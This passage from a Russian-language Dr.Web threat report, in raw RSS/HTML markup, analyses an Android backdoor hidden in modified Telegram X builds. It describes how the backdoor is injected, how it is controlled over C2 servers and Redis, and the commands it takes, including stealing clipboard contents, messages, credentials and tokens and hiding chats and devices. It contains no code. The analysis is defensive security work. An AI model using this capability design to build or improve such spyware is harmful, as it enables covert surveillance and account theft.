href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, которые условно можно разделить на 3 основные группы модификаций Telegram X:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;версии, в которых злоумышленники встроили бэкдор в основной исполняемый DEX-файл мессенджера;&lt;/li&gt;&lt;li&gt;версии, в которых бэкдор в виде патча динамически внедряется в исполняемый DEX-файл при помощи утилиты LSPatch;&lt;/li&gt;&lt;li&gt;версии, в которых бэкдор находится в отдельном DEX-файле в каталоге с ресурсами программы и загружается динамически.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Независимо от типа модификации&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; инициализируется при запуске самого мессенджера. Тот остается работоспособным и для пользователей выглядит как обычная программа. Однако в действительности злоумышленники через бэкдор полностью его контролируют и даже могут изменять логику его работы.&lt;/p&gt;&lt;p&gt;Когда киберпреступникам необходимо выполнить действие, которое не требует вмешательства в основную функциональность программы, используются заранее подготовленные «зеркала» необходимых методов приложения. Например, с их помощью могут отображаться фишинговые сообщения в окнах, которые внешне не будут отличаться от настоящих окон Telegram X.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;i&gt;Методы — это отдельные блоки кода в структуре Android-приложений, которые отвечают за выполнение тех или иных задач.&lt;/i&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;Если же действие не является стандартным для программы, то используется фреймворк Xposed, который непосредственно меняет ту или иную функциональность мессенджера через динамическую модификацию методов. В частности, с его помощью скрываются определенные чаты и авторизованные устройства, а также перехватывается содержимое буфера обмена.&lt;/p&gt;&lt;p&gt;Основное отличие ранних версий вредоносного приложения от актуальных — в организации управления трояном. В старых модификациях связь со злоумышленниками и получение от них заданий реализованы традиционным способом — через C2-сервер. Однако со временем вирусописатели добавили в&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; возможность отправки дополнительных команд через базу данных Redis, расширив тем самым его функциональность и обеспечив двумя независимыми каналами управления. При этом они предусмотрели дублирование новых команд и через обычный C2-сервер на случай, если база окажется недоступной. Это первый известный факт применения Redis для управления вредоносным ПО для Android.&lt;/p&gt;&lt;p&gt;Во время запуска&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; соединяется с начальным C2-сервером для загрузки конфигурации, которая среди прочего содержит данные для подключения к Redis. Через эту базу данных злоумышленники не только отправляют определенные команды вредоносному приложению, но и обновляют настройки трояна. В том числе они назначают адрес текущего C2-сервера, а также NPS-сервера. Последний вирусописатели используют для подключения зараженных устройств к своей внутренней сети (интранету) и превращения их в прокси для выхода в интернет.&lt;/p&gt;&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;&amp;nbsp;периодически связывается с C2-сервером через API-вызовы и может получать следующие задания:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;загрузить на C2-сервер входящие СМС и контакты из телефонной книги зараженного устройства;&lt;/li&gt;&lt;li&gt;отправить на сервер содержимое буфера обмена при сворачивании мессенджера и возвращении в его окно;&lt;/li&gt;&lt;li&gt;получить от C2-сервера интернет-адреса для демонстрации рекламы, а также адрес сервера для скачивания обновления трояна в виде исполняемого DEX-файла;&lt;/li&gt;&lt;li&gt;получить ключи шифрования, которые используются при отправке некоторых данных на C2-сервер — например, содержимого буфера обмена;&lt;/li&gt;&lt;li&gt;запросить группу команд на сбор информации об установленных на устройстве приложениях, истории сообщений, контактах из телефонной книги устройства и об устройствах, на которых выполнен вход в Telegram (запрос выполняется с интервалом в 30 минут);&lt;/li&gt;&lt;li&gt;запросить у C2-сервера ссылку для скачивания обновления Telegram X;&lt;/li&gt;&lt;li&gt;запросить у C2-сервера конфигурацию, которая сохраняется в виде JSON-файла;&lt;/li&gt;&lt;li&gt;запросить информацию о базе данных Redis;&lt;/li&gt;&lt;li&gt;загрузить на C2-сервер информацию об устройстве при каждой сетевой активности мессенджера;&lt;/li&gt;&lt;li&gt;получить с C2-сервера список ботов, которые затем добавляются в список контактов Telegram;&lt;/li&gt;&lt;li&gt;каждые 3 минуты передавать на сервер информацию о текущих разрешениях приложения, состоянии устройства (включен ли или выключен экран, активно ли приложение), а также номер мобильного телефона с именем и паролем от учетной записи Telegram;&lt;/li&gt;&lt;li&gt;каждую минуту запрашивать команды в формате, аналогичном командам от базы данных Redis.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Для получения команд через Redis&amp;nbsp;&lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; подключается к соответствующему серверу злоумышленников, где регистрирует свой подканал — к нему в дальнейшем подключаются киберпреступники. Они публикуют в нем задания, которые бэкдор затем исполняет. Вредоносная программа может получать следующие команды:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;создать черный список чатов, которые не будут отображаться пользователю в окне Telegram X;&lt;/li&gt;&lt;li&gt;скрыть от пользователя заданные устройства в списке авторизованных для его учетной записи;&lt;/li&gt;&lt;li&gt;заблокировать на заданное время отображение уведомлений от чатов из созданного черного списка;&lt;/li&gt;&lt;li&gt;показать окно с информацией об обновлении приложения Telegram X — при нажатии на него пользователь перенаправляется на заданный сайт;&lt;/li&gt;&lt;li&gt;отправить на C2-сервер информацию обо всех установленных приложениях;&lt;/li&gt;&lt;li&gt;сбросить на зараженном устройстве текущую сессию авторизации пользователя в Telegram;&lt;/li&gt;&lt;li&gt;показать окно с информацией об обновлении приложения Telegram X, где пользователю предлагается установить APK-файл (если файл отсутствует, троян предварительно скачивает его);&lt;/li&gt;&lt;li&gt;убрать значок Telegram Premium в интерфейсе приложения у текущего пользователя;&lt;/li&gt;&lt;li&gt;загрузить на C2-сервер информацию из баз данных Telegram X, в которых хранится история чатов, сообщения и другие конфиденциальные данные;&lt;/li&gt;&lt;li&gt;подписать пользователя на заданный Telegram-канал;&lt;/li&gt;&lt;li&gt;покинуть заданный Telegram-канал;&lt;/li&gt;&lt;li&gt;вступить от лица пользователя в Telegram-чат по указанной ссылке;&lt;/li&gt;&lt;li&gt;получить список устройств, на которых выполнена авторизация в Telegram;&lt;/li&gt;&lt;li&gt;запросить получение токена аутентификации пользователя и передать его на С2-сервер.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Отметим, что перехват данных из буфера обмена, когда пользователь сворачивает мессенджер и снова возвращается в его окно, позволяет реализовывать различные сценарии кражи конфиденциальных данных. Например, жертва может скопировать пароль или мнемоническую фразу для входа в криптокошелек, текст важного документа для отправки бизнес-партнерам по почте и т. д., а троян перехватит оставшиеся в буфере данные и передаст злоумышленникам.&lt;/p&gt;&lt;p&gt;Dr.Web Security Space для мобильных устройств успешно обнаруживает и удаляет известные версии бэкдора &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, поэтому для наших пользователей он опасности не представляет.&lt;/p&gt;&lt;p&gt;Подробнее об &lt;a href="https://vms.drweb.ru/virus/?i=30931099"&gt;&lt;strong&gt;Android.Backdoor.Baohuo.1.origin&lt;/strong&gt;&lt;/a&gt;&lt;br&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Backdoor.Baohuo.1.origin/README.adoc"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item></channel></rss>
